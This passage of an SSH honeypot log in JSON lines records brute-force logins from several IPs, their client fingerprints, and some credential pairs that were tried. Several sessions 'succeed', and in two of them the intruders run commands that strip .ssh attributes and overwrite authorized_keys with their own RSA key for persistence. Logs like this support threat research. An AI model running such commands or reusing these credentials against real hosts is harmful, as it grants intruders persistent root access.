-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:41:20.750938Z","src_ip":"106.51.92.114","session":"628b434ecc7a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:41:20.838016Z","src_ip":"212.227.235.229","session":"9ac900560045"}
{"eventid":"cowrie.login.failed","username":"private","password":"Password","message":"login attempt [private/Password] failed","sensor":"my-vps","timestamp":"2025-09-08T12:41:21.542960Z","src_ip":"212.227.235.229","session":"9ac900560045"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T12:41:21.833371Z","src_ip":"106.51.92.114","session":"628b434ecc7a"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:41:22.711510Z","src_ip":"212.227.235.229","session":"9ac900560045"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:41:23.094292Z","src_ip":"106.51.92.114","session":"628b434ecc7a"}
{"eventid":"cowrie.session.connect","src_ip":"106.51.92.114","src_port":50164,"dst_ip":"1.2.3.4","dst_port":22,"session":"b7de75d0d684","protocol":"ssh","message":"New connection: 106.51.92.114:50164 (1.2.3.4:22) [session: b7de75d0d684]","sensor":"my-vps","timestamp":"2025-09-08T12:41:23.359702Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:41:23.361735Z","src_ip":"106.51.92.114","session":"b7de75d0d684"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:41:23.624844Z","src_ip":"106.51.92.114","session":"b7de75d0d684"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T12:41:24.718341Z","src_ip":"106.51.92.114","session":"b7de75d0d684"}
{"eventid":"cowrie.session.closed","duration":"8.2","message":"Connection lost after 8.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:41:24.979576Z","src_ip":"106.51.92.114","session":"629c3e2f77d7"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:41:24.982470Z","src_ip":"106.51.92.114","session":"b7de75d0d684"}
{"eventid":"cowrie.session.connect","src_ip":"154.221.16.135","src_port":38668,"dst_ip":"1.2.3.4","dst_port":22,"session":"a1c3c1e8bbc4","protocol":"ssh","message":"New connection: 154.221.16.135:38668 (1.2.3.4:22) [session: a1c3c1e8bbc4]","sensor":"my-vps","timestamp":"2025-09-08T12:41:49.578130Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:41:49.579097Z","src_ip":"154.221.16.135","session":"a1c3c1e8bbc4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:41:49.772740Z","src_ip":"154.221.16.135","session":"a1c3c1e8bbc4"}
{"eventid":"cowrie.login.success","username":"root","password":"qwe@123456","message":"login attempt [root/qwe@123456] succeeded","sensor":"my-vps","timestamp":"2025-09-08T12:41:50.590763Z","src_ip":"154.221.16.135","session":"a1c3c1e8bbc4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T12:41:50.999801Z","src_ip":"154.221.16.135","session":"a1c3c1e8bbc4"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T12:41:51.000739Z","src_ip":"154.221.16.135","session":"a1c3c1e8bbc4"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T12:41:51.001575Z","src_ip":"154.221.16.135","session":"a1c3c1e8bbc4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:41:51.230060Z","src_ip":"154.221.16.135","session":"a1c3c1e8bbc4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T12:41:51.707613Z","src_ip":"154.221.16.135","session":"a1c3c1e8bbc4"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T12:41:51.708438Z","src_ip":"154.221.16.135","session":"a1c3c1e8bbc4"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T12:41:51.927298Z","src_ip":"154.221.16.135","session":"a1c3c1e8bbc4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:41:51.928333Z","src_ip":"154.221.16.135","session":"a1c3c1e8bbc4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47968,"dst_ip":"1.2.3.4","dst_port":22,"session":"0cb90ec882fb","protocol":"ssh","message":"New connection: 212.227.235.229:47968 (1.2.3.4:22) [session: 0cb90ec882fb]","sensor":"my-vps","timestamp":"2025-09-08T12:41:52.005580Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:41:52.006827Z","src_ip":"212.227.235.229","session":"0cb90ec882fb"}
{"eventid":"cowrie.session.connect","src_ip":"154.221.16.135","src_port":38684,"dst_ip":"1.2.3.4","dst_port":22,"session":"ce0c662d3772","protocol":"ssh","message":"New connection: 154.221.16.135:38684 (1.2.3.4:22) [session: ce0c662d3772]","sensor":"my-vps","timestamp":"2025-09-08T12:41:52.184393Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:41:52.185280Z","src_ip":"154.221.16.135","session":"ce0c662d3772"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:41:52.308017Z","src_ip":"212.227.235.229","session":"0cb90ec882fb"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:41:52.427649Z","src_ip":"154.221.16.135","session":"ce0c662d3772"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T12:41:53.440842Z","src_ip":"154.221.16.135","session":"ce0c662d3772"}
{"eventid":"cowrie.login.failed","username":"test2","password":"2025","message":"login attempt [test2/2025] failed","sensor":"my-vps","timestamp":"2025-09-08T12:41:53.547654Z","src_ip":"212.227.235.229","session":"0cb90ec882fb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60618,"dst_ip":"1.2.3.4","dst_port":22,"session":"ed6146bb23f0","protocol":"ssh","message":"New connection: 212.227.235.229:60618 (1.2.3.4:22) [session: ed6146bb23f0]","sensor":"my-vps","timestamp":"2025-09-08T12:41:54.006464Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:41:54.007272Z","src_ip":"212.227.235.229","session":"ed6146bb23f0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:41:54.132916Z","src_ip":"212.227.235.229","session":"ed6146bb23f0"}
{"eventid":"cowrie.login.failed","username":"dixi","password":"09N1RCa1Hs31","message":"login attempt [dixi/09N1RCa1Hs31] failed","sensor":"my-vps","timestamp":"2025-09-08T12:41:54.675348Z","src_ip":"212.227.235.229","session":"ed6146bb23f0"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:41:54.685539Z","src_ip":"154.221.16.135","session":"ce0c662d3772"}
{"eventid":"cowrie.session.connect","src_ip":"154.221.16.135","src_port":33668,"dst_ip":"1.2.3.4","dst_port":22,"session":"9f2d469ee285","protocol":"ssh","message":"New connection: 154.221.16.135:33668 (1.2.3.4:22) [session: 9f2d469ee285]","sensor":"my-vps","timestamp":"2025-09-08T12:41:54.841718Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:41:54.842381Z","src_ip":"154.221.16.135","session":"9f2d469ee285"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:41:54.849403Z","src_ip":"212.227.235.229","session":"0cb90ec882fb"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:41:55.040568Z","src_ip":"154.221.16.135","session":"9f2d469ee285"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:41:55.801834Z","src_ip":"212.227.235.229","session":"ed6146bb23f0"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T12:41:55.877400Z","src_ip":"154.221.16.135","session":"9f2d469ee285"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:41:56.076796Z","src_ip":"154.221.16.135","session":"9f2d469ee285"}
{"eventid":"cowrie.session.closed","duration":"6.5","message":"Connection lost after 6.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:41:56.120982Z","src_ip":"154.221.16.135","session":"a1c3c1e8bbc4"}
{"eventid":"cowrie.session.connect","src_ip":"184.174.35.208","src_port":46694,"dst_ip":"1.2.3.4","dst_port":22,"session":"34d27335c64e","protocol":"ssh","message":"New connection: 184.174.35.208:46694 (1.2.3.4:22) [session: 34d27335c64e]","sensor":"my-vps","timestamp":"2025-09-08T12:42:08.293447Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:42:08.294525Z","src_ip":"184.174.35.208","session":"34d27335c64e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:42:08.319316Z","src_ip":"184.174.35.208","session":"34d27335c64e"}
{"eventid":"cowrie.login.success","username":"root","password":"P@ssword.123","message":"login attempt [root/P@ssword.123] succeeded","sensor":"my-vps","timestamp":"2025-09-08T12:42:08.459442Z","src_ip":"184.174.35.208","session":"34d27335c64e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T12:42:08.526527Z","src_ip":"184.174.35.208","session":"34d27335c64e"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T12:42:08.527246Z","src_ip":"184.174.35.208","session":"34d27335c64e"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T12:42:08.528267Z","src_ip":"184.174.35.208","session":"34d27335c64e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:42:08.553827Z","src_ip":"184.174.35.208","session":"34d27335c64e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T12:42:08.698647Z","src_ip":"184.174.35.208","session":"34d27335c64e"}
